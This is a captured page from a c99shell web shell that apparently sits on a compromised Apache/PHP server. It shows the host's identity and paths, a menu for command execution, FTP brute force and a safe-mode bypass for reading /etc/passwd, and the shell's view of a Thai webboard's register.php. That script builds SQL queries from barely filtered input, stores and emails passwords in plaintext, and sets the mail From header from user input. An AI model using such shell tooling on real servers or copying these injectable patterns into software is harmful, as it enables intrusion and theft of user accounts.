!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/webboard/   drwxr-xr-x
Free 52.37 GB of 127.8 GB (40.97%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     register.php (6.87 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
	require("config.inc.php");

?>

	<html>
	<head>
	<title><?echo $title?></title>
	<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="./style.css" rel="stylesheet" type="text/css">

	</head>
	<body bgcolor=#FFFFE0 background="pic/bg2.gif">
<?
$BDdate = ("$b_year"."-"."$b_month"."-"."$b_day");
$BDdate = trim(htmlspecialchars($BDdate));
	$User = trim(htmlspecialchars($User));
	$Pass1 = trim(htmlspecialchars($Pass1));
	$Pass2 = trim(htmlspecialchars($Pass2));
	$Email = trim(htmlspecialchars($Email));
	$ICQ = trim(htmlspecialchars($ICQ));
	$WebName = trim(htmlspecialchars($WebName));
	$URL = trim(htmlspecialchars($URL));
    $Profile = trim(htmlspecialchars($Profile));
	$memphoto = trim(htmlspecialchars($memphoto));
	// ตรวจสอบว่ารหัสผ่านตรงกันหรือไม่
	$n_pw1 = strlen($Pass1);
	if($b_day=="0"){echo "<br>";
		echo "<center>";
		echo "<font size=3 face='MS Sans Serif'>";
	echo "ใส่ วัน,เดือน,ปี ด้วย";
	echo "</font>";
	echo "<br><br>";
	echo "<a href='javascript:history.back(1)'>[ กลับไปแก้ไข ] </a>";
	echo "</center>";
	exit();
	}elseif($b_month=="0")
	{echo "<br>";
		echo "<center>";	
		echo "<font size=3 face='MS Sans Serif'>";
	echo "ใส่ เดือน,ปี ด้วย";
	echo "</font>";
	echo "<br><br>";
	echo "<a href='javascript:history.back(1)'>[ กลับไปแก้ไข ] </a>";
	echo "</center>";
	exit();
	}elseif($b_year=="0")
	{echo "<br>";
		echo "<center>";
		echo "<br>";
		echo "<font size=3 face='MS Sans Serif'>";
	echo "ใส่ ปี ด้วย";
	echo "</font>";
	echo "<br><br>";
	echo "<a href='javascript:history.back(1)'>[ กลับไปแก้ไข ] </a>";
	echo "</center>";
	exit();
	}
	if($Pass1!=$Pass2 || $n_pw1<4) {
		echo "<center>";
		echo "<table width=60% border=1 bordercolor=#ff69b4 bgcolor=#f0ffff cellpadding=2 cellspacing=0>";
		echo "<tr><td align=center>";
		echo "<font size=2 face='MS Sans Serif'>";
        echo "<font size=3 color=red><b>รหัสผ่านไม่ตรงกัน</b></font><br><br>";
		echo "หรือน้อยกว่า 4 หลัก กรุณาตรวจสอบให้ถูกต้องด้วยครับ : )";
		echo "</font></td></tr></table>";
		echo "<br><hr width=500 color=blue>";
		echo "<font size=2 face='MS Sans Serif'>";
		echo "[<a href='javascript:history.back(1)'>Back</a>]";
		echo "</center>";
		exit();
	}

	if($action!="edit") {
	// ตรวจสอบว่า user ที่รับมาเคยลงทะเบียนไปหรือยัง
	mysql_connect($host,$user,$passwd);
	$sql = "select User from webboard_member where User='$User'";
	$result = mysql_db_query($dbname,$sql);
	$NRow = mysql_num_rows($result);



	// ถ้าเคยลงทะเบียนแล้ว ให้แจ้งข้อผิดพลาด
	if($NRow!=0) {
		echo "<center>";
		echo "<table width=60% border=1 bordercolor=#ff69b4 bgcolor=#f0ffff cellpadding=2 cellspacing=0>";
		echo "<tr><td align=center>";
		echo "<font size=2 face='MS Sans Serif'>";
        echo "<font size=3 color=red><b>Username [$User] ได้ถูกใช้ไปแล้ว</b></font><br><br>";
		echo "กรุณาเปลี่ยน Username ด้วยครับ";
		echo "</font></td></tr></table>";
		echo "<br><hr width=500 color=blue>";
		echo "<font size=2 face='MS Sans Serif'>";
		echo "[<a href='javascript:history.back(1)'>Back</a>]";
		echo "</center>";
		exit();
	}
	mysql_close(); 
	}

	// ป้องกันการแทรก html กับ ละเครื่องหมาย ' "
	$User = htmlspecialchars($User);
	$Password = htmlspecialchars($Pass1);
	$Email = htmlspecialchars($Email);
	$ICQ = htmlspecialchars($ICQ);
	$WebName = htmlspecialchars($WebName);
	$URL = htmlspecialchars($URL);
$Profile = htmlspecialchars($Profile);
$memphoto = htmlspecialchars($memphoto);
$BDdate = htmlspecialchars($BDdate);
	// ปรับเวลาให้ตรงกับเวลาเมืองไทย กรณีที่ server อยู่ที่เมืองนอก
	$mdate = date("Y-m-d H:i:s");

mysql_connect($host,$user,$passwd);
$sql = "select * from webboard_member where memphoto='$memphoto'";
$result = mysql_db_query($dbname,$sql);
	$NRow = mysql_num_rows($result);



#ตัดสคิ้ป html และตัด http://
		$User = htmlspecialchars( $User );
		$Profile = htmlspecialchars( $Profile );
		$Profile = nl2br( $Profile );


	if($action=="edit") {
		$sql = "update webboard_member set Password='$Password' , Email='$Email' , ICQ='$ICQ' , WebName='$WebName' , URL='$URL',Profile='$Profile' ,icon='$b_icon' where User='$User'";
	

	}
	else {
		$sql = "insert into webboard_member (User,Password,Email,ICQ,WebName,URL,Date,BDdate,Profile,icon) values ('$User','$Password','$Email','$ICQ','$WebName','$URL','$mdate','$BDdate','$Profile','$b_icon')";
		
	}
	$result = mysql_db_query($dbname,$sql);

	if($result==0) {
		echo "<center>";
		echo "<table width=60% border=1 bordercolor=#ff69b4 bgcolor=#f0ffff cellpadding=2 cellspacing=0>";
		echo "<tr><td align=center>";
		echo "<font size=2 face='MS Sans Serif'>";
        echo "<font size=3 color=red><b>มีข้อผิดพลาดที่ระบบ</b></font><br><br>";
		echo "กรุณาแจ้ง admin ให้ตรวจสอบด้วยครับ";
		echo "</font></td></tr></table>";
		echo "<br><hr width=500 color=blue>";
		echo "<font size=2 face='MS Sans Serif'>";
		echo "[<a href='javascript:history.back(1)'>Back</a>]";
		echo "</center>";
		exit();
	}
	mysql_close(); 

	if($action=="edit") {
		echo "<center>";
		echo "<table width=60% border=1 bordercolor=#ff69b4 bgcolor=#f0ffff cellpadding=2 cellspacing=0>";
		echo "<tr><td align=center>";
		echo "<font size=2 face='MS Sans Serif'>";
		echo "<font size=3 color=red><b>ได้แก้ไขข้อมูลของ $User </b></font><br><br>";
		echo "และบันทึกลงในฐานข้อมูลแล้ว<br>";
		echo "และได้ส่ง user:passwd ไปยัง email ของท่านแล้ว";
		echo "</font></td></tr></table>";
		echo "<br><hr width=500 color=blue>";
		echo "<font size=2 face='MS Sans Serif'>";
		
	}
	else {
		echo "<center>";
		echo "<table width=60% border=1 bordercolor=#ff69b4 bgcolor=#f0ffff cellpadding=2 cellspacing=0>";
		echo "<tr><td align=center>";
		echo "<font size=2 face='MS Sans Serif'>";
		echo "<font size=3 color=red><b>ได้เพิ่มข้อมูลของ $User </b></font><br><br>";
		echo "ลงในฐานข้อมูลแล้ว<br>";
		echo "และได้ส่ง user:passwd ไปยัง email ของท่านแล้ว";
		echo "</font></td></tr></table>";
		echo "<br><hr width=500 color=blue>";
		echo "<font size=2 face='MS Sans Serif'>";
		echo "$BDdate";
		
	}
	//ส่งเมล์บอกรหัสผ่าน
		$subject ="Username และ Password ของคุณสำหรับใช้ในเว็บบอร์ด ";
		$msg  = "ขอขอบคุณ คุณ $User\n";
		$msg  .= "ที่สมัครสมาชิกเว็บบอร์ด\n";
		$msg  .= "และหวังว่าคงได้รับความเอื้อเฟื้อ ในโอกาสอื่นๆต่อไป..\n\n";

		$msg  .= "==================================================\n";
		$msg  .= "คุณสามารถใช้ Username และ Passwoed นี้ในเว็บบอร์ด \n";
		$msg .= "และสามารถแก้ไขข้อมูลได้ตลอดเวลา\n\n";
		
		$msg .= "Username ::  $User \n";
		$msg .= "Password ::  $Password \n\n";
		$msg  .= "==================================================\n\n";

		$msg  .= "Webmaster\n";
		$from = "From: $Email\nReply-To: $webmasterEmail\nReturn-Path: $webmasterEmail";
		mail(strtolower($Email) , $subject , $msg , $from);
?>
	<br>
<font size=2 face="MS Sans Serif"> [<a href="../webboard/webboard.php?Category=<? echo $Category; ?>&page=<? echo $page; ?>">ไปหน้าเว็บบอร์ด</a>] 
</font>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0053 ]--